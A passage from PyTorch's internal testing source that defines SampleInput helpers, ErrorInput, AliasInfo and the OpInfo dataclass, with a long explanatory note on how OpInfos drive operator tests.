Tensor with shape (3, 4) is formatted as Tensor[3, 4] if isinstance(arg, torch.Tensor): shape = str(tuple(arg.shape)).replace('(', '').replace(')', '') return f"Tensor[{shape}]" elif isinstance(arg, dict): return {k: formatter(v) for k, v in arg.items()} elif is_iterable_of_tensors(arg): return "TensorList[" + ", ".join(map(formatter, arg)) + "]" elif isinstance(arg, (list, tuple)): # Handle list, tuple return "(" + ",".join(map(formatter, arg)) + ")" return repr(arg) return self._repr_helper(formatter) # Applies the transform f(t) -> t to each tensor and dtype in the SampleInput def transform(self, f): def tt(t): def _tt(t): with torch.no_grad(): return f(t) if isinstance(t, torch.Tensor): return _tt(t) elif isinstance(t, torch.dtype): return _tt(t) elif isinstance(t, list): return list(map(tt, t)) elif isinstance(t, tuple): return tuple(map(tt, t)) elif isinstance(t, dict): return {k: tt(v) for k, v in t.items()} else: return t sample_tt_input, tt_args, tt_kwargs = tt(self.input), tt(self.args), tt(self.kwargs) # Note the transformed SampleInput assumes metadata like output_process_fn_grad is still valid! return SampleInput( sample_tt_input, args=tt_args, kwargs=tt_kwargs, output_process_fn_grad=self.output_process_fn_grad, broadcasts_input=self.broadcasts_input, name=self.name + "_transformed") # Returns the NumPy version of the sample input object in the form of a tuple: (input, args, kwargs) # Converts tensors to ndarrays by calling .detach().cpu().numpy() on them # Converts dtypes by remapping them using torch_to_numpy_dtype_dict def numpy(self): def to_numpy(t): if isinstance(t, torch.Tensor): if t.dtype is torch.bfloat16: return t.detach().cpu().to(torch.float32).numpy() if t.dtype is torch.chalf: return t.detach().cpu().to(torch.cfloat).numpy() return t.detach().cpu().numpy() elif isinstance(t, torch.dtype): return torch_to_numpy_dtype_dict[t] return t return self.transform(to_numpy) def noncontiguous(self): def to_noncontiguous(t): if isinstance(t, torch.Tensor): return noncontiguous_like(t) elif isinstance(t, torch.dtype): return t return t return self.transform(to_noncontiguous) class ErrorInput(object): """ A SampleInput that will cause the operation to throw an error plus information about the resulting error. """ __slots__ = ['sample_input', 'error_type', 'error_regex'] def __init__(self, sample_input, *, error_type=RuntimeError, error_regex): self.sample_input = sample_input self.error_type = error_type self.error_regex = error_regex class AliasInfo(object): """Class holds alias information. For example, torch.abs -> torch.absolute, torch.Tensor.absolute, torch.Tensor.absolute_ """ def __init__(self, alias_name): self.name = alias_name self.op = _getattr_qual(torch, alias_name) self.method_variant = getattr(torch.Tensor, alias_name, None) self.inplace_variant = getattr(torch.Tensor, alias_name + "_", None) def __call__(self, *args, **kwargs): return self.op(*args, **kwargs) # Extension of getattr to support qualified names # e.g. 
#   _getattr_qual(torch, 'linalg.norm') -> torch.linalg.norm
def _getattr_qual(obj, name, default=_NOTHING):
    try:
        for path in name.split('.'):
            obj = getattr(obj, path)
        return obj
    except AttributeError:
        if default is not _NOTHING:
            return default
        else:
            raise

# test if a tensor is close to an integer
def close_to_int(x, eps=0.1):
    if x.is_complex():
        y = torch.abs(torch.view_as_complex(torch.frac(torch.view_as_real(x))))
    else:
        y = torch.abs(torch.frac(x))
    return (y < eps) | (y > (1 - eps))


NumericsFilter = collections.namedtuple('NumericsFilter', ['condition', 'safe_val'])


# Note [OpInfos]
# ~~~~~~~~~~~~~~
#
# The majority of this note was written shortly after the PyTorch 1.9 release.
# If you notice it's out-of-date or think it could be improved then please
# file an issue.
#
# See also: the OpInfo tracker (https://github.com/pytorch/pytorch/issues/54261)
# See also: "Writing Test Templates" in common_device_type.py to learn how to
# parametrize a test template using OpInfos.
# See also: PyTorch's GitHub wiki on running and writing tests
# https://github.com/pytorch/pytorch/wiki/Running-and-writing-tests
# See also: ModuleInfos, OpInfo's sister class, defined in common_modules.py
#
# An OpInfo is a collection of metadata related to a PyTorch operator. This
# metadata is used to generate tests that validate properties of the operator,
# like whether it implements the correct gradient formula.
#
# WHY OPINFOS?
# ~~~~~~~~~~~~
#
# OpInfos are principally intended to do three things:
#
# 1) to allow systematic testing over all PyTorch's operators
# 2) to simplify operator testing by autogenerating many tests
# 3) to allow systems (like autograd, torchscript, fx, nnc...) to test
# against every PyTorch operator
#
# All these goals are still a work in progress. Not every operator has an
# OpInfo, and some operator tests that could be automatically generated
# still have to be written manually.
#
# It's helpful to understand that OpInfos are both about test simplification and
# modularity. PyTorch is a complicated framework with many interrelated systems,
# too many for any one person to keep track of. An OpInfo can be thought of as the
# interface between an operator implementer and those other systems. Instead of
# requiring the implementer of torch.foo to understand how to test its forward
# mode AD or NNC support, that's typically handled automatically just by
# defining an OpInfo.
#
# It's often surprising to OpInfo writers that just implementing an OpInfo
# typically can't verify an operator is actually implemented correctly:
#
# "If an OpInfo doesn't validate my op works as expected, what's the point
# of it?"
#
# But the point is the above. OpInfos are intended to let you focus on testing
# the operator logic you're familiar with instead of having to write tests for
# how the operator interacts with each of PyTorch's many systems.
#
# And, OK, it turns out that SOMETIMES just writing an OpInfo DOES
# validate your op works as expected, but that's only in special
# cases. See below for details.
#
# WHAT'S AN OPINFO?
# ~~~~~~~~~~~~~~~~~
#
# So what is an OpInfo? It's a Python class that describes an operator's properties,
# like which dtypes it supports on the CPU and whether it has any aliases.
# These properties can be divided into three categories:
#
# 1) Metadata describing the operator, like the operator's name and if it
# "supports" the out kwarg.
# 2) Test directives, like "skips" that tell the test suite to skip some
# tests.
# 3) A "sample inputs" function that generates valid inputs for the operator.
#
# OpInfo attributes are described in more detail below.
#
# THE SAMPLE INPUTS FUNCTION
# ~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# The "sample inputs" function merits special elaboration. This function is
# crucial to testing with OpInfos. A typical OpInfo test has to treat the operator
# as a black box. There's no structure for the test to understand or exploit.
# Without "sample inputs" it wouldn't even know how to call the OpInfo's
# operator. The sample input function saves the day by providing different
# "SampleInputs" that can be used to call the operator. A sample input
# function should have the following signature:
#
#   def sample_inputs_foo(op_info, device, dtype, requires_grad, **kwargs):
#
# And should return an iterable of SampleInputs (see the class description
# above). Each SampleInput defines an "input", "args", "kwargs", an
# "output_process_fn_grad" function, the "broadcasts_input" bool and a
# "name".
#
# All the "sample_inputs" functions are invoked within a `torch.no_grad()`
# environment for efficiency and correctness. As such remember to set the
# "requires_grad" flag on the inputs **after** performing any transformations
# on them.
#
# The "input" is the first argument to the operator, or the tensor that
# the method or inplace variants of the operator should be called on, and
# should be on the requested device, of the requested dtype, and its
# requires_grad attribute should be set to the requires_grad argument.
#
# "args" should contain positional arguments, and "kwargs" keyword arguments.
#
# "output_process_fn_grad" has an interesting name. It's a function that maps
# the operator's output (when given the input, args, and kwargs) to the
# portion of the output to gradcheck. For example, consider an operator
# like torch.linalg.slogdet
# (https://pytorch.org/docs/master/generated/torch.linalg.slogdet.html).
# This operator returns a tuple of two tensors, but the first tensor
# cannot be backwarded through. Its "output_process_fn_grad" filters
# this output tuple to just the second argument, which we can call backward
# on. Functions that produce a single tensor can ignore this argument.
#
# "broadcasts_input" is a bool indicating whether the SampleInput causes the operator
# to broadcast the "input" argument. This is important for tests to understand
# because inplace variants of operations throw a runtime error if they
# would broadcast their input arguments, so tests that work with inplace
# variants filter SampleInputs that broadcast their input.
#
# "name" is a string that's just used for debugging. It appears when printing
# the SampleInput.
#
# Sample inputs are designed to be used with many tests, some
# of which are very time consuming, so they should be a small
# set with small tensors. An elaborated set of sample inputs
# can be specified using the "reference_inputs_func" attribute.
# The "reference inputs" for an operation are an extended
# set of sample inputs that can more exhaustively test an
# operator. They are used by only a few tests that are careful
# not to take too long to run. Adding reference inputs
# is highly encouraged!
#
# THE (OPTIONAL) ERROR INPUTS FUNCTION
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# OpInfos may optionally specify "error inputs" through an error function. If
# specified, test_errors in test_ops.py will call the op with these inputs
# and validate that the desired error is thrown. (A hypothetical sketch of
# both functions appears just below.)
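# As a concrete but hypothetical sketch of these two functions -- the operator
# "foo", its shapes, kwargs, and error message below are invented for
# illustration and do not correspond to an operator defined in this file:
#
#   def sample_inputs_foo(op_info, device, dtype, requires_grad, **kwargs):
#       make_arg = partial(make_tensor, device=device, dtype=dtype,
#                          requires_grad=requires_grad)
#       # Keep the set small and the tensors tiny: many expensive tests
#       # iterate over every SampleInput this function yields.
#       for shape in ((), (S,), (S, S)):
#           yield SampleInput(make_arg(shape), args=(2,), kwargs={'alpha': 0.5})
#
#   def error_inputs_foo(op_info, device, **kwargs):
#       # Assumes the hypothetical torch.foo raises a RuntimeError matching
#       # the regex below when given an empty tensor.
#       si = SampleInput(make_tensor((0,), device=device, dtype=torch.float32))
#       yield ErrorInput(si, error_type=RuntimeError,
#                        error_regex='expected a non-empty tensor')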
#
# Error inputs automate a common testing pattern where multiple inputs are
#   passed to an operation and the errors they throw are reviewed. Tests
#   written in this style should be ported to the new OpInfo pattern.
#
# Error inputs are specified using the ErrorInputs class, which contains
#   a SampleInput (see above) and data about the expected error.
#
# OPINFO FILE ORGANIZATION
# ~~~~~~~~~~~~~~~~~~~~~~~~
#
# All OpInfos are currently defined in this file. Most OpInfo tests are defined
#   in test_ops.py, but some system-specific tests are defined in those
#   systems' test files, and subclass-specific tests are defined in the test
#   file that corresponds to that subclass (see below).
#   Expect a reorganization in the future.
#
# WHAT'S TESTED?
# ~~~~~~~~~~~~~~
#
# Every OpInfo in the op_db sequence has the following properties validated in
#   test_ops.py:
#
#   - that its supported dtypes are specified correctly
#   - that the operation produces the same results when called with noncontiguous inputs
#   - that it supports the out= argument properly (if it allows out=),
#       see https://github.com/pytorch/pytorch/wiki/Developer-FAQ#how-does-out-work-in-pytorch
#   - that it works with the conjugate view bit properly
#   - that its function, method, and inplace variants perform the same operation
#       (that is, that torch.add, torch.Tensor.add, and torch.Tensor.add_ all
#       do the same thing).
#   - that its inplace variant preserves the input's storage
#   - that its gradient formula is implemented correctly, and that it supports
#       gradgrad, complex grad and gradgrad, and forward mode AD properly for
#       the op's function and inplace variants (method variants are skipped
#       to reduce test time).
#   - that the operation performs the same operation when traced or scripted
#       using the jit
#   - that the operation is autodifferentiated by the jit as expected
#   - that the operator's aliases, if any, perform the same operation and that
#       the jit understands the alias
#   - that the operator throws the correct errors (if error_inputs is defined)
#   - that the operator produces the same results as a NumPy reference (if ref is defined)
#   - that the operator produces the same results as a NumPy reference on an extended
#       set of "reference inputs" (if both ref and reference_inputs_func are defined)
#       (NOTE: elementwise unary and elementwise binary OpInfos do this even if only
#       ref is defined, because they effectively autogenerate reference inputs)
#   - that the operator works on different CUDA devices
#
# Additional OpInfo tests are in test_jit_fuser_te.py, test_fx_experimental.py,
#   and test_fx.py. These tests validate that operators work with NNC and FX
#   as expected.
#
# For performance, some of the above tests may only run on the first
#   SampleInput returned by an OpInfo's sample input function.
#
# In addition to these tests, some subclasses (discussed in the next section)
#   define additional tests.
#
# Critically, as mentioned above, what's not necessarily tested is that the operator
#   works as expected. When implementing an OpInfo an engineer must still
#   typically write one or more tests validating the operator's behavior.
#   The exception to this is if reference testing is sufficient, or if
#   the operation belongs to an OpInfo subclass that has more exhaustive
#   operator testing. Elementwise unary and elementwise binary operators,
#   in particular, usually don't require additional testing beyond
#   writing an OpInfo.
#
#
# OPINFO (SUB)CLASSES
# ~~~~~~~~~~~~~~~~~~~
#
# In addition to the OpInfo base class there are several specialized OpInfo
#   subclasses. For example, the UnaryUfuncInfo subclass is used for
#   unary elementwise operations. These operations have a common structure
#   that test_unary_ufuncs.py exploits with additional automated testing.
#   The automated testing in test_unary_ufuncs.py is so thorough, comparing
#   the operator to a NumPy reference function on a plethora of values, that
#   just implementing an OpInfo for a unary elementwise operation is often
#   sufficient testing.
#
# The ForeachFuncInfo is another OpInfo subclass that is hyper-specialized to a
#   very particular class of operations. These OpInfos aren't included in the
#   op_db sequence and have their own tests.
#
# Other OpInfo subclasses, like SpectralFuncInfo, are just for convenience
#   when writing OpInfos.
#
# TESTING A NEW OPERATOR
# ~~~~~~~~~~~~~~~~~~~~~~
#
# If you're adding a new operator to any of the following namespaces:
#   - torch
#   - torch.fft
#   - torch.linalg
#   - torch.special
#   - torch.nn.functional
# then you should typically add an OpInfo for it.
#
# As mentioned a couple times above, implementing an OpInfo is not
#   usually sufficient testing (unless the operator is a unary or binary elementwise
#   operator). The OpInfo will only test the properties described in the
#   "WHAT'S TESTED" section. It DOES NOT necessarily verify that the operator is
#   implemented correctly.
#
# TIPS FOR WRITING AN OPINFO AND OPINFO TESTS
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Writing an OpInfo can be a little daunting. Since the point of an OpInfo is to
#   be consumed by a variety of systems it can be hard to understand how to
#   deal with test failures or how to set the OpInfo metadata properly.
#
# Before adding an OpInfo it helps to look at other OpInfos. A sample inputs
#   function must be defined, and the operator's dtypes must be specified.
#   Once that's done you should run the operator's tests in test_ops.py
#   (these can be filtered using the "-k" argument in pytest). Tests that
#   fail should provide an error message that describes what to change about
#   your OpInfo. You don't need to worry about changing an OpInfo's default
#   values unless a test yells at you.
#
# Similarly, if you're writing a test that consumes OpInfos then it's critical
#   your test provides a clear error message describing what to do when it
#   fails. You should not assume the OpInfo implementer is familiar with your
#   system.
#
# If you see a confusing error message while developing an OpInfo then please
#   file an issue describing what happened.
#
# This trial-and-error approach to writing an OpInfo can be frustrating,
#   but it's probably necessary as long as OpInfos don't require
#   learning about all the systems that consume them. One thing that can help
#   is the get_supported_dtypes() function defined in opinfo_helper.py. This
#   function can be used to programmatically specify the dtypes an operator
#   supports, and is especially useful if writing an OpInfo on a machine
#   without a CUDA device. See its documentation for more details.
#
# THE FUTURE OF OPINFOS AND OPINFO TESTING
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# In the future we expect OpInfo coverage to improve and cover
#   the great majority of PyTorch's (public) operators.
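#
# As a purely illustrative, hypothetical sketch (the op "foo" and every value
#   below are made up, and real op_db entries typically carry more metadata),
#   a sample inputs function and its OpInfo entry might look like:
#
#   def sample_inputs_foo(op_info, device, dtype, requires_grad, **kwargs):
#       make_arg = partial(make_tensor, device=device, dtype=dtype,
#                          requires_grad=requires_grad)
#       yield SampleInput(make_arg((S, S)))
#       yield SampleInput(make_arg((S, S)), kwargs=dict(keepdim=True))
#
#   OpInfo('foo',
#          dtypes=floating_and_complex_types_and(torch.half),
#          sample_inputs_func=sample_inputs_foo,
#          supports_out=False),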

# Classes and methods for the operator database
@dataclass
class OpInfo(object):
    """Operator information and helper functions for acquiring it."""

    # the string name of the function
    name: str

    # An optional reference function that accepts ndarrays (AKA "NumPy arrays").
    # If given, the op will be compared with its reference on each of its sample inputs.
    ref: Callable = None

    # the following metadata describes the operator, its variants, and its aliases, if any

    # iterable of aliases, e.g. ("absolute",) for torch.abs
    aliases: Iterable = None

    # additional string to include in the test name
    # this is useful when an op needs multiple OpInfos,
    # like divide does, often because it's really several
    # different ops behind the scenes
    variant_test_name: str = ''

    # the function variant of the operation, populated as torch.<name> if None
    op: Callable = None

    # allows the method variant of this operation to be specified as follows:
    # - if _NOTHING (default), then the OpInfo attempts to discover the variant using its name
    # - if None, then the OpInfo explicitly specifies it has no associated method
    # - if a Callable, then that callable should be the method associated with this operation
    method_variant: Callable = _NOTHING

    # allows the inplace variant of this operation to be specified as follows:
    # - if _NOTHING (default), then the OpInfo attempts to discover the variant using its name
    # - if None, then the OpInfo explicitly specifies it has no associated inplace variant
    # - if a Callable, then that callable should be the inplace variant associated with this operation
    inplace_variant: Callable = _NOTHING

    # allows the operator variant of this operation to be specified as follows:
    # - if _NOTHING (default), then the OpInfo attempts to discover the variant using its name
    # - if None, then the OpInfo explicitly specifies it has no associated operator
    # - if a Callable, then that callable should be the operator associated with this operation
    operator_variant: Callable = _NOTHING

    # allows the inplace operator variant of this operation to be specified as follows:
    # - if _NOTHING (default), then the OpInfo attempts to discover the variant using its name
    # - if None, then the OpInfo explicitly specifies it has no associated inplace operator
    # - if a Callable, then that callable should be the inplace operator associated with this operation
    inplace_operator_variant: Callable = _NOTHING

    # the following metadata are test directives for skipping or modifying tests

    # information about which tests to skip
    skips: Tuple = tuple()

    # decorators to apply to generated tests
    decorators: Tuple = tuple()

    # the following are pointers to functions to generate certain classes of inputs

    # function to generate sample inputs with strided layouts
    sample_inputs_func: Callable = None

    # function to generate a more thorough set of sample inputs with strided layouts
    reference_inputs_func: Callable = None

    # function to generate inputs that will throw errors
    error_inputs_func: Callable = None

    # function to generate sample inputs with sparse coo layouts
    sample_inputs_sparse_coo_func: Callable = None

    # function to generate sample inputs with sparse csr layouts
    sample_inputs_sparse_csr_func: Callable = None

    # the following metadata relates to dtype support and is tested for correctness in test_ops.py

    # dtypes this function works with on the CPU,
    # inherited by other device types that don't specify their own dtypes
    dtypes: _dispatch_dtypes = None
    # the following dtypesIf... options override the dtypes value
    # on their respective device types

    # dtypes this function is expected to work with on CUDA
    dtypesIfCUDA: _dispatch_dtypes = None

    # dtypes this function is expected to work with on ROCM
    dtypesIfROCM: _dispatch_dtypes = None

    # backward dtypes this function is expected to work with
    backward_dtypes: _dispatch_dtypes = None

    # backward dtypes this function is expected to work with on CUDA
    backward_dtypesIfCUDA: _dispatch_dtypes = None

    # backward dtypes this function is expected to work with on ROCM
    backward_dtypesIfROCM: _dispatch_dtypes = None

    # the following metadata describes the operator's out= support

    # whether the op supports the out kwarg
    # defaults to True, if the op does not allow the out kwarg or
    # supports it incorrectly then test_out in test_ops.py should fail
    supports_out: bool = True

    # the following metadata relates to autograd support

    # whether the operation supports backward mode AD
    # if true, gradient correctness is tested in test_ops.py
    # using the op's sample inputs
    supports_autograd: bool = True

    # whether the op supports second order gradients
    # if true, gradgrad correctness is tested in test_ops.py
    # defaults to supports_autograd's value
    # TODO: rename this to supports_bwgrad_bwgrad to be consistent with below
    supports_gradgrad: bool = None

    # whether the op supports second order gradients via
    # forward-over-reverse. If True, forward-over-reverse gradgrad correctness
    # is tested. If False, test that forward grad is not implemented.
    # Defaults to False.
    supports_fwgrad_bwgrad: bool = False

    # whether the operation supports inplace autograd
    # if true, tested in test_ops.py
    # defaults to supports_autograd's value
    supports_inplace_autograd: bool = None

    # whether the operation supports forward mode AD
    # if the value is True, we check that the gradients are correct
    # if the value is False, we test that forward grad is not implemented
    supports_forward_ad: bool = False

    # wrapper function for gradcheck
    gradcheck_wrapper: Callable = lambda op, *args, **kwargs: op(*args, **kwargs)

    # whether to check batched grad when doing gradcheck
    # defaults to supports_autograd's value
    check_batched_grad: bool = None

    # whether to check batched grad grad when doing gradgradcheck
    # defaults to supports_gradgrad's value
    check_batched_gradgrad: bool = None

    # whether to check batched forward grad when doing gradcheck
    # defaults to the value of `supports_forward_ad`
    check_batched_forward_grad: bool = None

    # whether to check batched forward grad for the inplace variant when doing gradcheck
    # defaults to the value of `check_batched_forward_grad`
    check_inplace_batched_forward_grad: bool = None

    # tolerance for nondeterminism while performing gradcheck
    gradcheck_nondet_tol: float = 0.0

    # whether to use the fast implementation for gradcheck/gradgradcheck
    # when set to None, defers to the default value provided by the wrapper
    # function around gradcheck (testing._internal.common_utils.gradcheck)
    gradcheck_fast_mode: bool = None

    # the following metadata relates to JIT support and is tested for correctness in test_ops.py

    # name of the corresponding aten:: operator
    aten_name: str = None

    # if this is a composite implicit autograd op, the decomposed op
    decomp_aten_name: Optional[str] = None

    # name of the corresponding aten:: operator for backwards
    aten_backward_name: Optional[str] = None

    # if an op's aten::node is expected to be symbolically autodiffed
    assert_autodiffed: bool = False

    # a list of strings with node names that are expected to be in a
    # DifferentiableGraph when autodiffed.
    # Ex: ['aten::add', 'aten::mm'],
    # default is populated to be ['aten::(name of Python operator)']
    autodiff_nonfusible_nodes: List[str] = None

    # a list of strings with node names that are expected to be in FusionGroups
    # inside of DifferentiableGraphs when this operation is autodiffed.
    # Ex: ['aten::add', 'aten::mm'], defaults to an empty list
    # Note: currently no ops use fusible nodes
    autodiff_fusible_nodes: List[str] = None

    # the following metadata relates to sparse support and is used in test_sparse.py

    # whether the op supports sparse inputs
    supports_sparse: bool = False

    # only run tracing tests
    supports_scripting: bool = True

    # the following metadata relates to sparse csr support and is used in test_sparse_csr.py

    # whether the op supports sparse csr inputs
    supports_sparse_csr: bool = False

    # the following metadata relates to complex support and is checked in test_ops.py

    test_conjugated_samples: bool = True

    test_neg_view: bool = True

    # assert that jit shape analysis fully propagates shape
    assert_jit_shape_analysis: bool = False

    # the following metadata relates to ExpandedWeights support and is checked in test_expanded_weights.py
    supports_expanded_weight: bool = False

    def __post_init__(self):
        self._original_opinfo_args = asdict(self).copy()

        assert self.dtypes is not None, "OpInfo for {0} has no dtypes!".format(self.name)

        dtypes_args = (self.dtypes, self.dtypesIfCUDA, self.dtypesIfROCM)

        # Validates the dtypes are generated from the dispatch-related functions
        for dtype_list in dtypes_args:
            assert isinstance(dtype_list, (_dispatch_dtypes, type(None)))

        if self.aten_name is None:
            self.aten_name = self.name

        # Attribute to verify dynamic_dtypes are used.
        self.dynamic_dtypes = any(map(lambda dtypes: isinstance(
            dtypes, opinfo_helper._dynamic_dispatch_dtypes), dtypes_args))

        if self.dynamic_dtypes:
            # Make sure `dtypesIfCUDA` is dynamic if dynamic dispatch is used for CPU.
            # This is because, below, we set dtypesIfCUDA to dtypes if they are None.
            assert isinstance(self.dtypesIfCUDA, opinfo_helper._dynamic_dispatch_dtypes), \
                (f"To use dynamic dtypes for operator {self.name}, "
                 "acquire the dtypes dynamically for argument `dtypesIfCUDA`. "
                 "This is to ensure that CUDA dtypes are acquired correctly as they "
                 "differ from CPU dtypes occasionally")

        self.dtypes = set(self.dtypes)

        # NOTE: backward dtypes must be acquired before forward dtypes
        # since they fall back to explicit (not implicit!) specifications of
        # forward dtypes
        self.backward_dtypesIfROCM = set(self.backward_dtypesIfROCM) if self.backward_dtypesIfROCM is not None else (
            self.backward_dtypesIfCUDA if self.backward_dtypesIfCUDA is not None
            else self.backward_dtypes if self.backward_dtypes is not None
            else self.dtypesIfROCM if self.dtypesIfROCM is not None
            else self.dtypesIfCUDA if self.dtypesIfCUDA is not None
            else self.dtypes)
        self.backward_dtypesIfCUDA = set(self.backward_dtypesIfCUDA) if self.backward_dtypesIfCUDA is not None else (
            self.backward_dtypes if self.backward_dtypes is not None
            else self.dtypesIfCUDA if self.dtypesIfCUDA is not None
            else self.dtypes)
        self.backward_dtypes = set(self.backward_dtypes) if self.backward_dtypes is not None else self.dtypes

        self.dtypesIfCUDA = set(self.dtypesIfCUDA) if self.dtypesIfCUDA is not None else self.dtypes
        self.dtypesIfROCM = set(self.dtypesIfROCM) if self.dtypesIfROCM is not None else self.dtypesIfCUDA

        # NOTE: if the op is unspecified it is assumed to be under the torch namespace
        if not self.op:
            self.op = _getattr_qual(torch, self.name)

        if self.method_variant is _NOTHING:
            self.method_variant = getattr(torch.Tensor, self.name, None)

        # attributes like real, imag are not callable
        if not callable(self.method_variant):
            self.method_variant = None

        if self.inplace_variant is _NOTHING:
            inplace_name = self.name + "_"
            self.inplace_variant = getattr(torch.Tensor, inplace_name, None)

        if self.operator_variant is _NOTHING:
            self.operator_variant = getattr(operator, self.name, None)

        if self.inplace_operator_variant is _NOTHING:
            # Note: operator.i<op> will use operator.<op> and assign the result to the lhs when no
            # __i<op>__ method is found. This results in the appearance of an inplace operator variant which
            # does not have the correct inplace behavior. To avoid this, we guard automatic detection of the
            # inplace operator with a check that an inplace variant exists.
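            # For example (illustrative): for a Python int `a`, operator.iadd(a, 1)
            # computes `a + 1` and returns a new object because int defines no
            # __iadd__, so treating it as an inplace operator variant would be wrong.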
            if self.inplace_variant is not None:
                inplace_operator_name = "i" + self.name
                self.inplace_operator_variant = getattr(operator, inplace_operator_name, None)
            else:
                self.inplace_operator_variant = None

        self.decorators = (*self.decorators, *self.skips)

        # We run the sampling functions without tracking the gradients of the creation of inputs
        self.sample_inputs_func = torch.no_grad()(self.sample_inputs_func)
        self.sample_inputs_sparse_coo_func = torch.no_grad()(self.sample_inputs_sparse_coo_func)
        self.sample_inputs_sparse_csr_func = torch.no_grad()(self.sample_inputs_sparse_csr_func)
        if self.reference_inputs_func is not None:
            self.reference_inputs_func = torch.no_grad()(self.reference_inputs_func)

        if not self.autodiff_fusible_nodes:
            self.autodiff_fusible_nodes = []

        if self.autodiff_nonfusible_nodes is None:
            self.autodiff_nonfusible_nodes = ['aten::' + self.name]

        # Autograd support

        # Autograd flags that depend on backward AD only
        # - If setting has been explicitly set, raise error if inconsistent
        if self.supports_gradgrad is None:
            self.supports_gradgrad = self.supports_autograd
        else:
            assert not (self.supports_gradgrad and not self.supports_autograd), (
                "supports_gradgrad refines the part of autograd that is supported, so it should "
                "not be set if supports_autograd is False")
        if self.check_batched_grad is None:
            self.check_batched_grad = self.supports_autograd or self.supports_forward_ad
        else:
            assert not (self.check_batched_grad and not (self.supports_autograd or self.supports_forward_ad)), (
                "check_batched_grad refines the part of autograd that will be checked (by gradcheck), so "
                "it should not be set if supports_autograd is False")
        if self.check_batched_gradgrad is None:
            self.check_batched_gradgrad = self.supports_gradgrad
        else:
            assert not (self.check_batched_gradgrad and not self.supports_gradgrad), (
                "check_batched_gradgrad refines the part of autograd that will be checked (by "
                "gradgradcheck), so it should not be set if either supports_gradgrad or supports_autograd "
                "is False.")
        if self.check_batched_forward_grad is None:
            self.check_batched_forward_grad = self.supports_forward_ad
        else:
            assert not (self.check_batched_forward_grad and not self.supports_forward_ad), (
                "check_batched_forward_grad should only be used when supports_forward_ad "
                "is True. It is used to disable the test in the specific cases "
                "where the op supports forward ad but fails to compute "
                "batched forward grad.")

        if self.check_inplace_batched_forward_grad is None:
            self.check_inplace_batched_forward_grad = self.check_batched_forward_grad
        else:
            assert not (self.check_inplace_batched_forward_grad and not self.check_batched_forward_grad), (
                "check_inplace_batched_forward_grad should only be used when check_batched_forward_grad "
                "is True. It is used to disable the test in the specific cases "
                "where the op supports batched forward grad but fails to compute batched forward "
                "grad for the inplace variant of the op.")
        assert not (self.supports_fwgrad_bwgrad and not self.supports_autograd), (
            "supports_fwgrad_bwgrad enables forward-over-backward gradgrad checks and should only be "
            "True if backward ad is also checked, i.e., supports_autograd should be True.", self.name)

        # Autograd flags that depend on both forward AD and backward AD
        if self.supports_inplace_autograd is None:
            self.supports_inplace_autograd = self.supports_autograd or self.supports_forward_ad
        else:
            assert not (self.supports_inplace_autograd and not self.supports_autograd and not self.supports_forward_ad), (
                "supports_inplace_autograd refines the part of autograd that is supported, so "
                "it should not be set if both supports_autograd and supports_forward_ad are False")

        if self.aliases is not None:
            self.aliases = tuple(AliasInfo(a) for a in self.aliases)  # type: ignore[assignment]
        else:
            self.aliases = ()

    def __call__(self, *args, **kwargs):
        """Calls the function variant of the operator."""
        return self.op(*args, **kwargs)

    def __str__(self):
        return dataclass_repr(self)

    def get_op(self):
        """Returns the function variant of the operator, torch.<op_name>."""
        return self.op

    def get_method(self):
        """Returns the method variant of the operator, torch.Tensor.<op_name>.

        Returns None if the operator has no method variant.
        """
        return self.method_variant

    def get_inplace(self):
        """Returns the inplace variant of the operator, torch.Tensor.<op_name>_.

        Returns None if the operator has no inplace variant.
        """
        return self.inplace_variant

    def get_operator(self):
        """Returns the operator variant of the operator, e.g. operator.neg.

        Returns None if the operator has no operator variant.
        """
        return self.operator_variant

    def get_inplace_operator(self):
        """Returns the inplace operator variant of the operator, e.g. operator.iadd.

        Returns None if the operator has no inplace operator variant."""
        return self.inplace_operator_variant

    def conjugate_sample_inputs(self, device, dtype, requires_grad=False, **kwargs):
        """Returns an iterable of SampleInputs but with the tensor input or first
        tensor in a sequence input conjugated.
        """

        samples = self.sample_inputs_func(self, device, dtype, requires_grad, **kwargs)
        conj_samples = list(samples)

        def conjugate(tensor):
            _requires_grad = tensor.requires_grad
            tensor = tensor.conj()
            return tensor.requires_grad_(_requires_grad)

        for i, sample in enumerate(samples):
            sample = conj_samples[i]
            # Note: it is assumed that the input here is either a tensor or tensorlist
            if isinstance(sample.input, torch.Tensor):
                sample.input = conjugate(sample.input)
            else:
                sample.input[0] = conjugate(sample.input[0])

        return tuple(conj_samples)

    def sample_inputs(self, device, dtype, requires_grad=False, **kwargs):
        """
        Returns an iterable of SampleInputs.

        These samples should be sufficient to test the function works correctly
        with autograd, TorchScript, etc.
        """
        samples = self.sample_inputs_func(self, device, dtype, requires_grad, **kwargs)

        if kwargs.get('include_conjugated_inputs', False):
            conj_samples = self.conjugate_sample_inputs(device, dtype, requires_grad, **kwargs)
            samples_list = list(samples)
            samples_list.extend(conj_samples)
            samples = tuple(samples_list)

        return samples

    def reference_inputs(self, device, dtype, requires_grad=False, **kwargs):
        """
        Returns an iterable of SampleInputs.
Distinct from sample_inputs() above because this returns an expanded set of inputs when reference_inputs_func is defined. If undefined this returns the sample inputs. """ if self.reference_inputs_func is None: return self.sample_inputs_func(self, device, dtype, requires_grad, **kwargs) if kwargs.get('include_conjugated_inputs', False): raise NotImplementedError return self.reference_inputs_func(self, device, dtype, requires_grad, **kwargs) def error_inputs(self, device, **kwargs): """ Returns an iterable of ErrorInputs. """ return self.error_inputs_func(self, device, **kwargs) def sample_inputs_sparse_coo(self, device, dtype, requires_grad=False, **kwargs): """Returns an iterable of SampleInputs that contain inputs with sparse coo layout. """ return self.sample_inputs_sparse_coo_func(self, device, dtype, requires_grad, **kwargs) def sample_inputs_sparse_csr(self, device, dtype, requires_grad=False, **kwargs): """Returns an iterable of SampleInputs that contain inputs with sparse csr layout. """ return self.sample_inputs_sparse_csr_func(self, device, dtype, requires_grad, **kwargs) def get_decorators(self, test_class, test_name, device, dtype): '''Returns the decorators targeting the given test.''' result = [] for decorator in self.decorators: if isinstance(decorator, DecorateInfo): if decorator.is_active(test_class, test_name, device, dtype): result.extend(decorator.decorators) else: result.append(decorator) return result def supported_dtypes(self, device_type): if device_type == 'cpu': return self.dtypes if device_type == 'cuda': return 